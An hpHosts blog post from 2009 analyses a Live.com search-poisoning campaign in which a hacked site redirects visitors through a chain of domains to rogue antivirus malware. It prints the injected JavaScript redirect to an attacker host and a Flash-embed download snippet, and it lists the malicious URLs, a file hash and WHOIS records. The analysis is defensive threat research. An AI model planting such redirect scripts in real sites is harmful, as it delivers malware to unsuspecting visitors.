Blog for hpHosts, and whatever else I feel like writing about ....

Wednesday, 20 May 2009

Live.com poisoning - Gumblar/Martuz isn't the only infection around .....

I've just had an e-mail from a friend, with the subject "Gumblar gets all the attention, but the other guys are still busy too", and he couldn't be more right - the recent spate of Gumblar/Martuz infections are garnering all of the press coverage, with the rest going relatively ignored - well I won't stand for that. There's more than one infection going around, and this particular one involves not Google poisoning - but Live poisoning (Live for those folks unaware, is Microsofts search engine).

The Live.com query was for nothing more nefarious than a cupcake recipe, and the infected domain, regishouse.org, a hacked participant.

If we look at the regishouse.org source code, we immediately notice the following;

<center>
<script language=javascript>window.location=encodeURI("http://gje.stakeshouse.cn/in.cgi?9&tsk=id150-21mar09-r91&type=l&seoref="+encodeURIComponent(document.referrer)+"¶meter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=XXX"); </script>
</center>
<img src="1.jpg" height="100%" width="100%">


Following this URL sends us through a couple of redirects, with the final destination apparently varying. I didn't record the first time I followed it, but the report I received showed the following;

hxxp://gje.stakeshouse.cn/in.cgi?9&tsk=id150-21mar09-r91&type=l&seoref=http%253A%252F%252Fsearch.live.com%252Fresults.aspx%253Fq%253DCrave%252BCupcakes%252BRecipe%2526FORM%253DQSRE3¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=hxxp%253A%252F%252Fregishouse.org%252Ftemplates%252Fwaccamaw-kennels%252Fcrave-cupcake-recipe.html&default_keyword=XXX
hxxp://autoperformspec.com/in.cgi?9&tsk=id150-21mar09-r91&type=l&seoref=hxxp%25253A%25252F%25252Fsearch.live.com%25252Fresults.aspx%25253Fq%25253DCrave%25252BCupcakes%25252BRecipe%252526FORM%25253DQSRE3¶meter=$keyword&se=$se&ur=1&hxxp_REFERER=hxxp%25253A%25252F%25252Fregishouse.org%25252Ftemplates%25252Fwaccamaw-kennels%25252Fcrave-cupcake-recipe.html&default_keyword=XXX
hxxp://dumake.cn/private-nonadult.html
hxxp://autoperformspec.com/in.cgi?17&private2=nonadult
hxxp://crownsafetytool.com/hitin.php?land=30&affid=02086
hxxp://autoperformspec.com/in.cgi?17&private4=nonadultexe
hxxp://updateserversoftware.com/update/?419dfa758bc79bd5dbabf30a392cd0db
hxxp://dumake.cn/favicon.ico


The second time I followed this, in order to document it for you fine folks, I was finally taken from gje.stakeshouse.cn through;

hxxp://autoperformspec.com/in.cgi?9&tsk=id150-21mar09-r91&type=l&seoref=%22+encodeURIComponent(document.referrer)+%22¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=%22+encodeURIComponent(document.URL)+%22&default_keyword=XXX
hxxp://crownsafetytool.com/hitin.php?land=30&affid=02086
hxxp://crownsafetytool.com/scan.php?affid=02086





Now I'm not saying they're paranoid but, apparently these fine folks want to ensure you're using Flash, presumably, to make it more difficult to automate analysis (like that's going to work);

function download()
{
// window.location='download.php?affid=02086';
window.document.getElementById('download').innerHTML="<embed src='load.swf?&p=0&t=_self&u=download.php?affid=02086' autostart=true width=1 height=1></embed>";
}


Note the "// " before window.location? This means the site previously used Javascript for the redirect ("//" is the Javascript and PHP "disable this line" tag).

So what does this give us? Why a lovely roguerific piece of crapness called System Security Antivirus (WinWebSecurity variant) of course!

hxxp://crownsafetytool.com/download.php?affid=02086

Which gives us a lovely little file called install.exe (482K - MD5: e8bba2fc1c2f1a89ad73bc897b424e65)

Result: 6/40 (15.00%)
https://www.virustotal.com/analisis/75763a67df6deb27c58338d9da957654

Domains involved:

gje.stakeshouse.cn - 91.212.41.110, 91.212.41.111, 91.212.41.96
autoperformspec.com - 91.212.41.110, 91.212.41.111
dumake.cn - 91.212.41.100
crownsafetytool.com - 209.44.126.22
updateserversoftware.com - 213.182.197.230

Net-blocks involved (recognize them?)

http://hosts-file.net/pest.asp?show=91.212.41

inetnum: 91.212.41.0 - 91.212.41.255
netname: gaztranzitstroyinfo-net
descr: LLC "Gaztransitstroyinfo"
country: RU
org: ORG-LA208-RIPE
admin-c: RM2628-RIPE
tech-c: RM2628-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: GAZTRANZITSTROYINFO-MNT
mnt-routes: GAZTRANZITSTROYINFO-MNT
mnt-domains: GAZTRANZITSTROYINFO-MNT
source: RIPE # Filtered

organisation: ORG-LA208-RIPE
org-name: LLC "Gaztransitstroyinfo"
phone: +7-921-2238843
org-type: OTHER
address: Russia, Sankt Peterburg, Kropotkina 1, office 299
e-mail: gaz@gaztranzitstroyinfo.ru
mnt-ref: GAZTRANZITSTROYINFO-MNT
mnt-by: GAZTRANZITSTROYINFO-MNT
source: RIPE # Filtered

person: Roman Matveev
address: Russia, Sankt Peterburg, Kropotkina 1, off. 299
mnt-by: GAZTRANZITSTROYINFO-MNT
phone: +7-921-2238843
nic-hdl: RM2628-RIPE
source: RIPE # Filtered

:: Information related to '91.212.41.0/24as29371'

route: 91.212.41.0/24
descr: GAZTRANZITSTROYINFO
origin: as29371
mnt-by: GAZTRANZITSTROYINFO-MNT
source: RIPE # Filtered


http://hosts-file.net/pest.asp?show=209.44.

OrgName: Netelligent Hosting Services Inc.
OrgID: NHS-31
Address: 1396 Franklin Drive
City: Laval
StateProv: QC
PostalCode: H7W-1K6
Country: CA

NetRange: 209.44.96.0 - 209.44.127.255
CIDR: 209.44.96.0/19
NetName: NETEL-ARIN-BLK02
NetHandle: NET-209-44-96-0-1
Parent: NET-209-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.NETELLIGENT.CA
NameServer: NS2.NETELLIGENT.CA
NameServer: NS3.NETELLIGENT.CA
Comment:
RegDate: 2006-08-01
Updated: 2007-03-20

RTechHandle: NETEL1-ARIN
RTechName: Netelligent Ops
RTechPhone: +1-514-369-2209
RTechEmail: ops@netelligent.ca

OrgAbuseHandle: NETEL2-ARIN
OrgAbuseName: Netelligent Abuse
OrgAbusePhone: +1-514-369-2209
OrgAbuseEmail: abuse@netelligent.ca

OrgTechHandle: NETEL1-ARIN
OrgTechName: Netelligent Ops
OrgTechPhone: +1-514-369-2209
OrgTechEmail: ops@netelligent.ca

# ARIN WHOIS database, last updated 2009-03-16 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database


http://hosts-file.net/pest.asp?show=213.182.197.

inetnum: 213.182.197.224 - 213.182.197.239
netname: Real_Host_NET1
descr: Real Host
country: LV
admin-c: DB8712-RIPE
tech-c: DB8712-RIPE
status: ASSIGNED PA
rev-srv: ns.junik.lv
rev-srv: ns2.junik.lv
mnt-by: AS8206-MNT
source: RIPE # Filtered

person: Danila Berencev
address: Kazakhstan, Almaty , Abay street 2a
abuse-mailbox: abuseemaildhcp@gmail.com
phone: + 87771697576
nic-hdl: DB8712-RIPE
source: RIPE # Filtered

:: Information related to '213.182.192.0/19AS8206'

route: 213.182.192.0/19
descr: JUNIK Riga Network part 2
origin: AS8206
mnt-by: AS8206-MNT
source: RIPE # Filtered

No comments: